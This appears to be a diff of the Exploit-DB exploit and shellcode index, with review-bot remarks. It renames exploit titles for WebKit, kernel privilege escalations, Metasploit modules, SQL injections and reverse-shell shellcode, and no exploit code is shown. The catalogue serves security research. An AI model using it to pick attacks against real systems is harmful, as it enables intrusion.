43167,exploits/multiple/dos/43167.js,"WebKit - 'WebCore::InputType::element' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple,
43167,exploits/multiple/dos/43167.js,"WebKit - 'WebCore::InputType::element' Use-After-Free (2)",2017-11-22,"Google Security Research",dos,multiple,
43168,exploits/multiple/dos/43168.js,"WebKit - 'WebCore::PositionIterator::decrement' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple,
43169,exploits/multiple/dos/43169.js,"WebKit - 'WebCore::AXObjectCache::performDeferredCacheUpdate' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple,
43170,exploits/multiple/dos/43170.js,"WebKit - 'WebCore::RenderText::localCaretRect' Out-of-Bounds Read",2017-11-22,"Google Security Research",dos,multiple,
@ -5852,8 +5853,8 @@ id,file,description,date,author,type,platform,port
120,exploits/linux/local/120.c,"TerminatorX 3.81 - Local Stack Overflow / Local Privilege Escalation",2003-11-13,Li0n7,local,linux,
122,exploits/windows/local/122.c,"Microsoft Windows - ListBox/ComboBox Control Local (MS03-045)",2003-11-14,xCrZx,local,windows,
125,exploits/bsd/local/125.c,"OpenBSD 2.x < 3.3 - 'exec_ibcs2_coff_prep_zmagic()' kernel stack overflow",2003-11-19,"Sinan Eren",local,bsd,
129,exploits/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation",2003-12-02,"Christophe Devine",local,linux,
131,exploits/linux/local/131.c,"Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation",2003-12-05,"Wojciech Purczynski",local,linux,
129,exploits/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (1)",2003-12-02,"Christophe Devine",local,linux,
131,exploits/linux/local/131.c,"Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (2)",2003-12-05,"Wojciech Purczynski",local,linux,
134,exploits/hp-ux/local/134.c,"HP-UX B11.11 - '/usr/bin/ct' Format String Privilege Escalation",2003-12-16,watercloud,local,hp-ux,
140,exploits/linux/local/140.c,"XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game",2004-01-02,c0wboy,local,linux,
141,exploits/linux/local/141.c,"Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (1)",2004-01-06,"Christophe Devine",local,linux,
@ -6506,7 +6507,7 @@ id,file,description,date,author,type,platform,port
8189,exploits/windows/local/8189.txt,"VUPlayer 2.49 - '.cue' Universal Buffer Overflow",2009-03-10,Stack,local,windows,
8193,exploits/windows/local/8193.py,"RainbowPlayer 0.91 - Playlist Universal Overwrite (SEH)",2009-03-10,His0k4,local,windows,
8201,exploits/windows/local/8201.pl,"Foxit Reader 3.0 (Build 1301) - PDF Universal Buffer Overflow",2009-03-13,SkD,local,windows,
8214,exploits/windows/local/8214.c,"Rosoft Media Player 4.2.1 - Local Buffer Overflow",2009-03-16,SimO-s0fT,local,windows,
8214,exploits/windows/local/8214.c,"Rosoft Media Player 4.2.1 (Windows XP SP2/3 French) - Local Buffer Overflow",2009-03-16,SimO-s0fT,local,windows,
8231,exploits/windows/local/8231.php,"CDex 1.70b2 (Windows XP SP3) - '.ogg' Local Buffer Overflow",2009-03-18,Nine:Situations:Group,local,windows,
8233,exploits/windows/local/8233.py,"Chasys Media Player 1.1 - '.pls' Local Stack Overflow",2009-03-18,His0k4,local,windows,
8234,exploits/windows/local/8234.py,"Chasys Media Player 1.1 - '.pls' Local Stack Overflow (2)",2009-03-18,Encrypt3d.M!nd,local,windows,
@ -9245,7 +9246,7 @@ id,file,description,date,author,type,platform,port
41130,exploits/android/local/41130.txt,"Google Android TSP sysfs - 'cmd_store' Multiple Overflows",2017-01-19,"Google Security Research",local,android,
41144,exploits/windows/local/41144.txt,"Microsoft Power Point 2016 - Java Code Execution",2017-01-21,"Fady Mohammed Osman",local,windows,
41149,exploits/osx/local/41149.md,"Microsoft Remote Desktop Client for Mac 8.0.36 - Code Execution",2017-01-23,"Filippo Cavallarin",local,osx,
41152,exploits/linux/local/41152.txt,"GNU Screen 4.5.0 - Local Privilege Escalation",2017-01-24,"Donald Buczek",local,linux,
41152,exploits/linux/local/41152.txt,"GNU Screen 4.5.0 - Local Privilege Escalation (PoC)",2017-01-24,"Donald Buczek",local,linux,
41154,exploits/linux/local/41154.sh,"GNU Screen 4.5.0 - Local Privilege Escalation",2017-01-25,"Xiphos Research Ltd",local,linux,
41158,exploits/linux/local/41158.md,"Man-db 2.6.7.1 - Local Privilege Escalation",2015-12-02,halfdog,local,linux,
41171,exploits/linux/local/41171.txt,"Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Local Privilege Escalation",2017-01-24,"Sebastian Krahmer",local,linux,
@ -9282,6 +9283,7 @@ id,file,description,date,author,type,platform,port
43494,exploits/windows/local/43494.cpp,"Jungo Windriver 12.5.1 - Local Privilege Escalation",2018-01-10,"Fidus InfoSecurity",local,windows,
43499,exploits/multiple/local/43499.txt,"Parity Browser < 1.6.10 - Bypass Same Origin Policy",2018-01-10,tintinweb,local,multiple,
43500,exploits/multiple/local/43500.txt,"Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping",2016-07-03,tintinweb,local,multiple,
43775,exploits/linux/local/43775.c,"glibc - 'getcwd()' Local Privilege Escalation",2018-01-16,halfdog,local,linux,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -9346,7 +9348,7 @@ id,file,description,date,author,type,platform,port
42045,exploits/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Root Privilege Escalation",2017-05-22,"Google Security Research",local,linux,
42053,exploits/linux/local/42053.c,"KDE 4/5 - 'KAuth' Local Privilege Escalation",2017-05-18,Stealth,local,linux,
42059,exploits/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,local,windows,
42076,exploits/linux/local/42076.py,"JAD java Decompiler 1.5.8e - Local Buffer Overflow",2017-05-26,"Juan Sacco",local,linux,
42076,exploits/linux/local/42076.py,"JAD Java Decompiler 1.5.8e - Local Buffer Overflow",2017-05-26,"Juan Sacco",local,linux,
42077,exploits/windows/local/42077.txt,"Microsoft MsMpEng - Multiple Problems Handling ntdll!NtControlChannel Commands",2017-05-26,"Google Security Research",local,windows,
42116,exploits/windows/local/42116.txt,"Parallels Desktop - Virtual Machine Escape",2017-06-05,"Mohammad Reza Espargham",local,windows,
42119,exploits/windows/local/42119.txt,"Subsonic 6.1.1 - XML External Entity Injection",2017-06-05,hyp3rlinx,local,windows,
@ -9362,7 +9364,7 @@ id,file,description,date,author,type,platform,port
42174,exploits/windows/local/42174.py,"Easy MOV Converter 1.4.24 - 'Enter User Name' Local Buffer Overflow (SEH)",2017-06-13,abatchy17,local,windows,
42181,exploits/windows/local/42181.py,"VX Search Enterprise 9.7.18 - Local Buffer Overflow",2017-06-15,ScrR1pTK1dd13,local,windows,
42183,exploits/linux/local/42183.c,"Sudo 1.8.20 - 'get_process_ttyname()' Local Privilege Escalation",2017-06-14,"Qualys Corporation",local,linux,
42255,exploits/linux/local/42255.py,"JAD Java Decompiler 1.5.8e - Local Buffer Overflow",2017-06-26,"Juan Sacco",local,linux,
42255,exploits/linux/local/42255.py,"JAD Java Decompiler 1.5.8e - Local Buffer Overflow (NX Enabled)",2017-06-26,"Juan Sacco",local,linux,
42265,exploits/linux/local/42265.py,"Flat Assembler 1.7.21 - Local Buffer Overflow",2017-06-28,"Juan Sacco",local,linux,
42267,exploits/windows/local/42267.py,"Easy File Sharing Web Server 7.2 - Account Import Local Buffer Overflow (SEH)",2017-06-28,Chako,local,windows,
42270,exploits/solaris_x86/local/42270.c,"Oracle Solaris 11.1/11.3 (RSH) - 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",local,solaris_x86,
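
Review bot: The suffix added to row 42255, `(NX Enabled)`, follows a different disambiguation convention from the numeric `(1)`/`(2)` suffixes this same commit gives the WebKit, do_brk, Barracuda and CesarFTP rows, and from the `(PoC)` suffix on the GNU Screen row. A descriptive qualifier is easier to search for than a bare number, so it would be worth choosing one convention for duplicate titles and applying it to all of the renamed rows in this change.
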
@ -9695,7 +9697,7 @@ id,file,description,date,author,type,platform,port
675,exploits/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,remote,windows,
681,exploits/linux/remote/681.c,"Citadel/UX 6.27 - Format String",2004-12-12,CoKi,remote,linux,504
689,exploits/multiple/remote/689.pl,"wget 1.9 - Directory Traversal",2004-12-15,jjminar,remote,multiple,
693,exploits/windows/remote/693.c,"Ability Server 2.34 - Remote APPE Buffer Overflow",2004-12-16,darkeagle,remote,windows,21
693,exploits/windows/remote/693.c,"Ability Server 2.34 - 'APPE' Remote Buffer Overflow",2004-12-16,darkeagle,remote,windows,21
705,exploits/multiple/remote/705.pl,"Webmin - Brute Force / Command Execution",2004-12-22,Di42lo,remote,multiple,10000
711,exploits/windows/remote/711.c,"CrystalFTP Pro 2.8 - Remote Buffer Overflow",2005-04-24,cybertronic,remote,windows,21
712,exploits/linux/remote/712.c,"SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Overflow",2004-12-23,pucik,remote,linux,8000
@ -9923,7 +9925,7 @@ id,file,description,date,author,type,platform,port
1885,exploits/windows/remote/1885.pl,"QBik WinGate WWW Proxy Server 6.1.1.1077 - 'POST' Remote Buffer Overflow",2006-06-07,kingcope,remote,windows,80
1889,exploits/hardware/remote/1889.txt,"D-Link DWL Series Access-Point 2.10na - Config Disclosure",2006-06-08,INTRUDERS,remote,hardware,
1906,exploits/windows/remote/1906.py,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow",2006-06-12,h07,remote,windows,
1915,exploits/windows/remote/1915.pm,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)",2006-06-15,c0rrupt,remote,windows,
1915,exploits/windows/remote/1915.pm,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (1)",2006-06-15,c0rrupt,remote,windows,
1940,exploits/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)",2006-06-22,"H D Moore",remote,windows,445
1965,exploits/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow (MS06-025) (Metasploit)",2006-06-29,Pusscat,remote,windows,445
1997,exploits/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP)",2006-07-09,joffer,remote,multiple,10000
@ -9943,9 +9945,9 @@ id,file,description,date,author,type,platform,port
2079,exploits/windows/remote/2079.pl,"eIQnetworks ESA - Syslog Server Remote Buffer Overflow",2006-07-27,"Kevin Finisterre",remote,windows,12345
2080,exploits/windows/remote/2080.pl,"eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)",2006-07-27,"Kevin Finisterre",remote,windows,10616
2082,exploits/multiple/remote/2082.html,"Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution",2006-07-28,"H D Moore",remote,multiple,
2136,exploits/hardware/remote/2136.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-07,"Greg Sinclair",remote,hardware,
2136,exploits/hardware/remote/2136.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (1)",2006-08-07,"Greg Sinclair",remote,hardware,
2140,exploits/windows/remote/2140.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (3)",2006-08-07,ri0t,remote,windows,10616
2145,exploits/hardware/remote/2145.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-08,PATz,remote,hardware,
2145,exploits/hardware/remote/2145.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (2)",2006-08-08,PATz,remote,hardware,
2162,exploits/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-08-10,"H D Moore",remote,windows,445
2164,exploits/windows/remote/2164.pm,"Microsoft Internet Explorer - 'MDAC' Remote Code Execution (MS06-014) (Metasploit) (2)",2006-08-10,"H D Moore",remote,windows,
2185,exploits/linux/remote/2185.pl,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (3)",2006-08-14,K-sPecial,remote,linux,110
@ -10451,7 +10453,7 @@ id,file,description,date,author,type,platform,port
6217,exploits/windows/remote/6217.pl,"BlazeDVD 5.0 - '.PLF' Playlist File Remote Buffer Overflow",2008-08-10,LiquidWorm,remote,windows,
6220,exploits/windows/remote/6220.html,"Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX Remote Buffer Overflow",2008-08-10,"Guido Landi",remote,windows,
6227,exploits/windows/remote/6227.c,"IntelliTamper 2.07 - HTTP Header Remote Code Execution",2008-08-10,"Wojciech Pawlikowski",remote,windows,
6229,exploits/multiple/remote/6229.txt,"Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal",2008-08-11,"Simon Ryeo",remote,multiple,
6229,exploits/multiple/remote/6229.txt,"Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)",2008-08-11,"Simon Ryeo",remote,multiple,
6236,exploits/multiple/remote/6236.txt,"BIND 9.5.0-P2 - 'Randomized Ports' Remote DNS Cache Poisoning",2008-08-13,Zbr,remote,multiple,
6238,exploits/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 - A HREF Remote Buffer Overflow",2008-08-13,kralor,remote,windows,
6248,exploits/windows/remote/6248.pl,"FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH Stack Overflow",2008-08-15,SkOd,remote,windows,21
@ -11508,7 +11510,7 @@ id,file,description,date,author,type,platform,port
16710,exploits/windows/remote/16710.rb,"Trellian FTP Client 3.01 - PASV Remote Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows,
16711,exploits/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,remote,windows,
16712,exploits/windows/remote/16712.rb,"BolinTech DreamFTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,remote,windows,21
16713,exploits/windows/remote/16713.rb,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)",2011-02-23,Metasploit,remote,windows,
16713,exploits/windows/remote/16713.rb,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (2)",2011-02-23,Metasploit,remote,windows,
16714,exploits/windows_x86/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,remote,windows_x86,2100
16715,exploits/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows,21
16716,exploits/windows/remote/16716.rb,"Odin Secure FTP 4.1 - 'LIST' Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows,
@ -14647,7 +14649,7 @@ id,file,description,date,author,type,platform,port
31694,exploits/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad ELHarmeel",remote,windows,
31695,exploits/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,remote,php,
31706,exploits/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",remote,unix,
31736,exploits/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow",2014-02-18,Sumit,remote,windows,80
31736,exploits/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (1)",2014-02-18,Sumit,remote,windows,80
31737,exploits/windows/remote/31737.rb,"Oracle Forms and Reports - Remote Code Execution (Metasploit)",2014-02-18,Metasploit,remote,windows,
31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,
31757,exploits/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header - Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,
@ -14658,7 +14660,7 @@ id,file,description,date,author,type,platform,port
31770,exploits/multiple/remote/31770.txt,"Oracle Application Server Portal 10g - Authentication Bypass",2008-05-09,"Deniz Cevik",remote,multiple,
31788,exploits/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' Man In The Middle Remote Code Execution",2014-02-20,"Julien Ahrens",remote,windows,
31789,exploits/windows/remote/31789.py,"PCMan FTP Server 2.07 - Remote Buffer Overflow",2014-02-20,Sumit,remote,windows,21
31814,exploits/windows/remote/31814.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow",2014-02-22,"OJ Reeves",remote,windows,
31814,exploits/windows/remote/31814.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (2)",2014-02-22,"OJ Reeves",remote,windows,80
31820,exploits/unix/remote/31820.pl,"IBM Lotus Sametime 8.0 - Multiplexer Buffer Overflow",2008-05-21,"Manuel Santamarina Suarez",remote,unix,
31828,exploits/hardware/remote/31828.txt,"Barracuda Spam Firewall 3.5.11 - 'ldap_test.cgi' Cross-Site Scripting",2008-05-22,"Information Risk Management Plc",remote,hardware,
31831,exploits/windows/remote/31831.py,"SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write",2014-02-22,"Mohamed Shetta",remote,windows,30000
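Review bot: the 31814 row changes more than the title. Besides the new "(2)" suffix, the port column goes from empty to 80. That matches 31736 in the previous hunk, which already lists 80, but the commit should say that a port was filled in so the change is not read as a pure rename.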
@ -16233,7 +16235,7 @@ id,file,description,date,author,type,platform,port
1011,exploits/asp/webapps/1011.php,"Maxwebportal 1.36 - 'Password.asp' Change Password (2) (PHP)",2005-05-26,mh_p0rtal,webapps,asp,
1012,exploits/asp/webapps/1012.txt,"Maxwebportal 1.36 - 'Password.asp' Change Password (1) (HTML)",2005-05-26,"Soroush Dalili",webapps,asp,
1013,exploits/php/webapps/1013.pl,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-26,"Petey Beege",webapps,php,
1014,exploits/php/webapps/1014.txt,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-27,"Danica Jones",webapps,php,
1014,exploits/php/webapps/1014.txt,"Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)",2005-05-27,"Danica Jones",webapps,php,
1015,exploits/asp/webapps/1015.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (3)",2005-05-27,"Soroush Dalili",webapps,asp,
1016,exploits/php/webapps/1016.pl,"phpStat 1.5 - 'setup.php' Authentication Bypass (Perl)",2005-05-30,Alpha_Programmer,webapps,php,
1017,exploits/php/webapps/1017.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (1)",2005-05-30,mh_p0rtal,webapps,php,
@ -19961,7 +19963,7 @@ id,file,description,date,author,type,platform,port
6677,exploits/php/webapps/6677.pl,"geccBBlite 2.0 - 'id' SQL Injection",2008-10-05,Piker,webapps,php,
6678,exploits/php/webapps/6678.txt,"Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection",2008-10-05,~!Dok_tOR!~,webapps,php,
6679,exploits/php/webapps/6679.txt,"phpAbook 0.8.8b - 'cookie' Local File Inclusion",2008-10-05,JosS,webapps,php,
6680,exploits/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload",2008-10-05,Pepelux,webapps,php,
6680,exploits/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload (PoC)",2008-10-05,Pepelux,webapps,php,
6681,exploits/php/webapps/6681.txt,"PHP-Fusion Mod manuals - 'manual' SQL Injection",2008-10-05,boom3rang,webapps,php,
6682,exploits/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel - 'INFO_RAID_ID' SQL Injection",2008-10-05,boom3rang,webapps,php,
6683,exploits/php/webapps/6683.txt,"PHP-Fusion Mod recept - 'kat_id' SQL Injection",2008-10-05,boom3rang,webapps,php,
@ -33152,7 +33154,7 @@ id,file,description,date,author,type,platform,port
33239,exploits/php/webapps/33239.txt,"Vastal I-Tech Cosmetics Zone - 'view_products.php' SQL Injection",2009-09-22,OoN_Boy,webapps,php,
33240,exploits/php/webapps/33240.txt,"Vastal I-Tech DVD Zone - 'view_mag.php' SQL Injection",2009-09-22,OoN_Boy,webapps,php,
33241,exploits/php/webapps/33241.txt,"Vastal I-Tech DVD Zone - 'view_mag.php' Cross-Site Scripting",2009-09-22,OoN_Boy,webapps,php,
33242,exploits/php/webapps/33242.txt,"Vastal I-Tech Agent Zone - SQL Injection",2009-09-23,OoN_Boy,webapps,php,
33242,exploits/php/webapps/33242.txt,"Vastal I-Tech Agent Zone - 'view_listing.php' SQL Injection",2009-09-23,OoN_Boy,webapps,php,
33345,exploits/php/webapps/33345.txt,"CuteNews 1.4.6 editnews Module - doeditnews Action Admin Moderation Bypass",2009-11-10,"Andrew Horton",webapps,php,
33343,exploits/php/webapps/33343.txt,"CuteNews 1.4.6 - 'result' Cross-Site Scripting",2009-11-10,"Andrew Horton",webapps,php,
33344,exploits/php/webapps/33344.txt,"CuteNews 1.4.6 - 'index.php' Cross-Site Request Forgery (New User Creation)",2009-11-10,"Andrew Horton",webapps,php,
@ -36014,11 +36016,11 @@ id,file,description,date,author,type,platform,port
37926,exploits/php/webapps/37926.txt,"Netsweeper 2.6.29.8 - SQL Injection",2015-08-21,"Anastasios Monachos",webapps,php,
37927,exploits/php/webapps/37927.txt,"Netsweeper 4.0.4 - SQL Injection",2015-08-21,"Anastasios Monachos",webapps,php,
37928,exploits/php/webapps/37928.txt,"Netsweeper 4.0.8 - SQL Injection / Authentication Bypass",2015-08-21,"Anastasios Monachos",webapps,php,
37929,exploits/php/webapps/37929.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",webapps,php,
37929,exploits/php/webapps/37929.txt,"Netsweeper 4.0.8 - Authentication Bypass (via Disabling of IP Quarantine)",2015-08-21,"Anastasios Monachos",webapps,php,
37930,exploits/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",webapps,php,
37931,exploits/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",webapps,php,
37932,exploits/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",webapps,php,
37933,exploits/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",webapps,php,
37933,exploits/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass (via New Profile Creation)",2015-08-21,"Anastasios Monachos",webapps,php,
37934,exploits/php/webapps/37934.txt,"WordPress Plugin Shopp - Multiple Vulnerabilities",2012-10-05,T0x!c,webapps,php,
37935,exploits/php/webapps/37935.txt,"Interspire Email Marketer - Cross-Site Scripting / HTML Injection / SQL Injection",2012-10-08,"Ibrahim El-Sayed",webapps,php,
37936,exploits/php/webapps/37936.txt,"Open Realty - 'select_users_lang' Local File Inclusion",2012-10-06,L0n3ly-H34rT,webapps,php,
@ -37176,6 +37178,7 @@ id,file,description,date,author,type,platform,port
43678,exploits/hardware/webapps/43678.txt,"D-Link DSL-2640R - Unauthenticated DNS Change",2018-01-17,"Todor Donev",webapps,hardware,
43682,exploits/hardware/webapps/43682.txt,"Belkin N600DB Wireless Router - Multiple Vulnerabilities",2018-01-17,Wadeek,webapps,hardware,
43683,exploits/php/webapps/43683.txt,"SugarCRM 3.5.1 - Cross-Site Scripting",2018-01-17,"Guilherme Assmann",webapps,php,
43733,exploits/java/webapps/43733.rb,"Primefaces 5.x - Remote Code Execution (Metasploit)",2018-01-18,"Bjoern Schuette",webapps,java,
40542,exploits/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php,
40543,exploits/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
40544,exploits/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
@ -37628,7 +37631,7 @@ id,file,description,date,author,type,platform,port
41456,exploits/php/webapps/41456.txt,"Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
41459,exploits/hardware/webapps/41459.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution",2017-02-25,SivertPL,webapps,hardware,
41460,exploits/php/webapps/41460.txt,"Joomla! Component Gnosis 1.1.2 - 'id' SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
41461,exploits/multiple/webapps/41461.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-01-15,"Mehmet Ince",webapps,multiple,
41461,exploits/multiple/webapps/41461.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) < 9.1.-1600 - Remote Code Execution (Metasploit)",2017-01-15,"Mehmet Ince",webapps,multiple,
41462,exploits/php/webapps/41462.txt,"Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
41463,exploits/php/webapps/41463.txt,"Joomla! Component My MSG 3.2.1 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
41464,exploits/php/webapps/41464.txt,"Joomla! Component Spinner 360 1.3.0 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
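Review bot: the version bound added to the 41461 title, "< 9.1.-1600", has a dot immediately followed by a hyphen, which reads as a typo. Confirm the intended build string and correct it before merging, since the title is what people search on.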
@ -38333,7 +38336,7 @@ id,file,description,date,author,type,platform,port
42968,exploits/php/webapps/42968.txt,"Complain Management System - Hard-Coded Credentials / Blind SQL injection",2017-10-10,havysec,webapps,php,
43013,exploits/cgi/webapps/43013.txt,"Linksys E Series - Multiple Vulnerabilities",2017-10-18,"SEC Consult",webapps,cgi,
42971,exploits/php/webapps/42971.rb,"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php,
42972,exploits/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php,
42972,exploits/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php,
42975,exploits/linux/webapps/42975.txt,"Trend Micro Data Loss Prevention Virtual Appliance 5.2 - Path Traversal",2017-10-11,"Leonardo Duarte",webapps,linux,
42978,exploits/php/webapps/42978.txt,"OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting",2017-10-12,"Ishaq Mohammed",webapps,php,
42979,exploits/php/webapps/42979.txt,"E-Sic Software livre CMS - 'q' SQL Injection",2017-10-12,"Guilherme Assmann",webapps,php,
@ -38392,7 +38395,7 @@ id,file,description,date,author,type,platform,port
43065,exploits/php/webapps/43065.py,"WordPress Plugin Ultimate Product Catalog 4.2.24 - PHP Object Injection",2017-10-30,tomplixsee,webapps,php,
43066,exploits/php/webapps/43066.txt,"Zomato Clone Script - 'resid' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,
43067,exploits/php/webapps/43067.txt,"Website Broker Script - 'status_id' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,
43068,exploits/php/webapps/43068.txt,"Vastal I-Tech Agent Zone - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,
43068,exploits/php/webapps/43068.txt,"Vastal I-Tech Agent Zone - 'searchCommercial.php' / 'searchResidential.php' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,
43069,exploits/php/webapps/43069.txt,"Php Inventory - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",webapps,php,
43070,exploits/php/webapps/43070.txt,"Online Exam Test Application - 'sort' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,
43071,exploits/php/webapps/43071.txt,"Nice PHP FAQ Script - 'nice_theme' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,


@ -17,13 +17,13 @@ id,file,description,date,author,type,platform
13256,shellcodes/bsd/13256.c,"BSD/x86 - Reverse TCP (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd
13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
